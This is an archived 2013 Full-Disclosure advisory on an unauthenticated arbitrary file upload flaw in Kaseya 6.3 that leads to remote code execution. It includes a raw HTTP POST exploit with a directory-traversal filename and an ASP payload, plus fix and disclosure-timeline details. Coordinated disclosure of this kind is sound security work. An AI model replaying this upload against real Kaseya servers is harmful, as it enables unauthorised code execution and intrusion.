lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <60E90CEE7B2D53499B74022758354F5F5B4B645A@SA-EXCH01.security-assessment.local>
Date: Mon, 18 Nov 2013 00:42:39 +0000
From: Thomas Hibbert <Thomas.Hibbert@...urity-assessment.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Kaseya 6.3 Arbitrary File Upload Vulnerability

(    , )     (, 
  .   `.' ) ('.    ', 
   ). , ('.   ( ) ( 
  (_,) .`), ) _ _, 
 /  _____/  / _  \    ____  ____   _____ 
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \ 
 /       \/   |    \\  \__(  <_> )  Y Y  \ 
/______  /\___|__  / \___  >____/|__|_|  / 
        \/         \/.-.    \/         \/:wq 
                    (x.0) 
                  '=.|w|.=' 
                  _='`"``=. 

                presents.. 

Kaseya Arbitrary File Upload Vulnerability
Affected versions: ??? - 6.3.0.2

PDF: http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf


+-----------+ 
|Description| 
+-----------+ 

Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code 
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges. 
The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using user input, without first checking if the user is authenticated or if input is valid. The application preserves the file name and extension of the upload, and allows an attacker to traverse from the default destination directory. 
Directory traversal is not necessary to gain code execution however, as the default path lies within the 
application’s web-root. 


+------------+ 
|Exploitation| 
+------------+ 

POST /SystemTab/uploadImage.asp?filename=..\..\..\..\test.asp HTTP/1.1 
Host: <host> 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0 
FirePHP/0.7.2 
Referer: http://<host>/SystemTab/uploadImage.asp 
Cookie: ASPSESSIONIDQATSBAQC=<valid session>; 
Connection: keep-alive 
Content-Type: multipart/form-data; boundary=---------------------------
19172947220212 
Content-Length: 89 
 
-----------------------------19172947220212 
Content-Disposition: form-data; name="uploadFile"; filename="test.asp" 
Content-Type: application/octet-stream 
 
<!DOCTYPE html> 
<html> 
<body> 
<% 
response.write("Hello World!") 
%> 
</body> 
</html> 
 
-----------------------------19172947220212--

+-----+ 
| Fix | 
+-----+ 

Install the patch released by the vendor on the 12th of November 2013.

+-------------------+ 
|Disclosure Timeline| 
+-------------------+ 

9/10/2013 Bug discovered, vendor contacted 
20/10/2013 Vendor responds with email address for security contact. Advisory sent to security contact. 
30/10/2013 Vendor advises that patch for the reported issue is to be included in next patch cycle. 
12/11/2013 Patch released. 
18/11/2013 Advisory publically released. 

+-----------------------------+ 
|About Security-Assessment.com| 
+-----------------------------+ 

Security-Assessment.com is a New Zealand based world 
leader in web application testing, network security 
and penetration testing. Security-Assessment.com 
services organisations across New Zealand, Australia, 
Asia Pacific, the United States and the United 
Kingdom. 

Security-Assessment.com is currently looking for skilled penetration 
testers. If you are interested, please email 'hr at security-assessment.com'

Thomas Hibbert
Security Consultant 
Security-Assessment.com
Mobile: +64 27 3133777 
Email: thomas.hibbert@...urity-assessment.com 
Web: www.security-assessment.com


Download attachment "PGP.sig" of type "application/pgp-signature" (823 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ